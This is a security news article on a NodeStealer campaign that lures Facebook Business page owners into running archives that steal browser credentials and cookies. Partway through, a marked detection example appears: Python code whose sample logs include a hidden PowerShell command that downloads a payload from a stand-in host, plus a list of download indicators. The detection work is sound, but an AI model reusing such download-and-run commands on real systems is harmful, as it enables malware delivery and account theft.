An ongoing campaign targets Facebook Business accounts with fake messages to harvest victims’ identifying information using a variant of the Python-based NodeStealer and potentially take over their accounts for subsequent malicious activity.
“The attacks are affecting victims mainly in southern Europe and North America, in different segments, led by the manufacturing services and technology sectors,” Netskope Threat Labs researcher Jan Michael said in an analysis published Thursday.
Palo Alto Networks Unit 42 last month revealed a separate attack wave that took place in December 2022 using a Python version of the malware, with selected iterations also designed to carry out the theft of cryptocurrency.
Netskope’s latest findings suggest that the Vietnamese actors behind the operation have likely resumed their attack efforts, not to mention adopting tactics used by other adversaries operating outside the country with the same objectives.
Earlier this week, Guardio Labs revealed how fraudulent messages sent via Facebook Messenger from a botnet of fake and hacked personal accounts were being used to transmit ZIP or RAR archive files that deliver the stealer malware to unsuspecting recipients.
The same modus operandi serves as the initial vector for NodeStealer intrusion chains to distribute RAR files hosted on Facebook’s Content Delivery Network (CDN).
“Images of defective products were used as bait to convince owners or administrators of Facebook business pages to download the malware payload,” Michael explained.
These archives come equipped with a batch script which, when executed, opens the Chrome web browser and takes the victim to a harmless web page. But in the background, a PowerShell command is run to fetch additional payloads, including the Python interpreter and NodeStealer malware.
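The chain just described (a batch script that opens a browser on a harmless page while a PowerShell command quietly downloads an interpreter and the stealer) leaves a distinctive parent/child pattern in process-creation telemetry. The following is an added detection example, not code from Netskope or the article: it runs a heuristic over a handful of constructed log events. The field names, the download-indicator strings and the process names are assumptions about a typical process-creation log, not details taken from the write-up.

```python
"""Added example: flag a batch script that spawns both a browser (the decoy)
and a PowerShell process with a download indicator, then check whether that
PowerShell went on to launch a Python interpreter (the staged payload).
Events below are constructed for illustration, not real telemetry."""
from collections import defaultdict

# Assumed indicators of a PowerShell download step (not from the article).
DOWNLOAD_HINTS = ("invoke-webrequest", "downloadstring", "downloadfile",
                  "iwr ", "curl ", "wget ")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
INTERPRETERS = {"python.exe", "pythonw.exe"}

# Constructed sample events: pid, parent pid, image name, command line.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",
     "cmdline": "explorer.exe"},
    # Suspicious chain: batch -> browser decoy + PowerShell downloader -> python
    {"pid": 200, "ppid": 100, "image": "cmd.exe",
     "cmdline": 'cmd.exe /c "C:\\Users\\u\\Downloads\\product_defect.bat"'},
    {"pid": 201, "ppid": 200, "image": "chrome.exe",
     "cmdline": "chrome.exe https://example.org/"},
    {"pid": 202, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c Invoke-WebRequest -Uri https://example.invalid/x -OutFile x"},
    {"pid": 203, "ppid": 202, "image": "python.exe",
     "cmdline": "python.exe stage2.py"},
    # Benign: user opens a browser straight from the desktop shell
    {"pid": 300, "ppid": 100, "image": "chrome.exe", "cmdline": "chrome.exe"},
    # Benign: an admin batch file runs a local script, no browser, no download
    {"pid": 400, "ppid": 100, "image": "cmd.exe", "cmdline": "cmd.exe /c backup.bat"},
    {"pid": 401, "ppid": 400, "image": "powershell.exe",
     "cmdline": "powershell.exe -File backup.ps1"},
]


def index_children(events):
    """Map each parent pid to the list of its direct child events."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    return children


def find_decoy_chains(events):
    """Return one record per cmd.exe that spawned a browser AND a PowerShell
    whose command line carries a download indicator. Each record notes
    whether that PowerShell then launched a Python interpreter."""
    children = index_children(events)
    hits = []
    for e in events:
        if e["image"].lower() != "cmd.exe":
            continue
        kids = children.get(e["pid"], [])
        opened_browser = any(k["image"].lower() in BROWSERS for k in kids)
        downloaders = [
            k for k in kids
            if k["image"].lower() == "powershell.exe"
            and any(h in k["cmdline"].lower() for h in DOWNLOAD_HINTS)
        ]
        if opened_browser and downloaders:
            spawned_python = any(
                g["image"].lower() in INTERPRETERS
                for d in downloaders
                for g in children.get(d["pid"], [])
            )
            hits.append({
                "batch_pid": e["pid"],
                "cmdline": e["cmdline"],
                "python_follow_on": spawned_python,
            })
    return hits


if __name__ == "__main__":
    for hit in find_decoy_chains(EVENTS):
        print(hit)
```

Requiring both the browser child and a downloading PowerShell child under the same batch parent is what keeps the two benign cases quiet; a real deployment would read the same fields from Sysmon event ID 1 or an EDR's process-start stream rather than the inline list.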
The stealer, in addition to capturing credentials and cookies – whether for Facebook or other sites – from various web browsers, is designed to collect system metadata and exfiltrate the information through Telegram.
“Compared to previous variants, the new NodeStealer variant uses batch files to download and run Python scripts, and steal credentials and cookies from multiple browsers and multiple websites,” Michael said.
“This campaign could be a gateway to a more targeted attack later since they have already collected useful information. Attackers who stole Facebook’s cookies and credentials can use them to take control of the account and carry out fraudulent transactions by exploiting the legitimate business page.”